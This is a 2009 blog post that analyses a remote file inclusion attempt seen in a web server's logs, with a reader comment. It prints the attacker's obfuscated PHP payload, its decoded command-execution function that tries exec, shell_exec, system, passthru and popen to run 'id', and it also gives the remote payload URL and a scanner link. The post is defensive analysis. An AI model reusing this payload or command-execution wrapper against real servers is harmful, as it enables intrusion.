1337 v0pCr3w – heh

Posted on 11 May 2009

Well, I thought this to be a humorous find in the webserver logs on a Monday afternoon.

It was an attempt to remotely load the following URL on the Aanval.com primary domain:

http://oubkhammuseum.com/templates/idvop.txt

The content of the URL (in the event is gets pulled):

[code lang=”php”]$vopcrew = “pZLNd8MwEITvgbyDIgyWIZT059Q0xdBYYg30TRCOvIpIecl15cYh5N0ryWTSUCCH3sTMzrfDosQg
TJF8/b7mH5/L6QRRcgj9TLRi9mT3srGv9CwafEEMjk0immVSSBnfgLDtR0OgdMHJxtTF8spnIjstn
DKaxDkJ2cGnLYQOduonlCR5Blrr9oMdfCXZGOPQK2fIRehOpNHNwzMOzwMoLD4Bv43SjH52bTaOvk
eNYw2IFdQ1v2BCjPyiD4VhQ/booDkVMxuOrrCOhUM+S3TIyPdQW2NcGO1Ae1Gc9SLokosaCs1hrHk
LUUrZ7urS0fz32lwh90TTTAEskQHRmhb0Y2t3dvb3dzR8il2ld2CzXIKRPpJy5ECif+fD0k9EbWh+
v2trypbkGMqK2mCgx9VeseA6q3AoKL8=”;
eval(gzinflate(str_rot13(base64_decode($vopcrew))));
exit;[/code]

And of course, the decoded PHP version that they would prefer to have executed:

[code lang=”php”]$os = @PHP_OS;
echo “v0pCr3w”;
echo “os:$os”;
$cmd=”id”;
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){

$res = ”;
if (!empty($cfe)){
if(function_exists(‘exec’)){
@exec($cfe,$res);
$res = join(“\n”,$res);
}
elseif(function_exists(‘shell_exec’)){
$res = @shell_exec($cfe);
}
elseif(function_exists(‘system’)){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists(‘passthru’)){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,”r”))){
$res = “”;
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}[/code]

Essentially, it is an attempt to identify the current user the web process is running under. As you can see they create the function ex(), which contains a simple iterative if / else / else / etc statement to test as many possible avenues to execute the shell command “id” to provide this information.

A quick search around the net provided the little perl scanner tool used:

http://www.loyalmoses.com/junk/vopcrew_multiscanner.txt

The offending IP apparently belongs to HostMySite which owns a good sized net block:

208.112.87.9

OrgName: HostMySite
Address: 650 Pencader Drive
City: Newark
StateProv: DE
PostalCode: 19702
Country: US

Rather amateurish, but effective. 😉


1 Response to 1337 v0pCr3w – heh

  • gigi says:

    Hi,
    i have got same problem but this means that they have tried to download that file on my server or have verified that it was already on my server?

    Regards
    Gigi

  • Recent Posts

    Tag Cloud

    3D Printing Aanval App Apple Badger Mt. Beef book Calf Cattle Cows development Eclipse F-250 F-450 Flex Builder Ford Gaming Horse House Hunting IDS iPad iPhone John Deere King Ranch mac Moses Family Moses Ranch off-grid Offgrid Outback Property Ranch Reining Riding Security Snort Snow Storm Tractor Trailer Truck VFX Weather Xcode

    Meta

    Loyal Moses is proudly powered by WordPress and the SubtleFlux theme.

    Copyright © Loyal Moses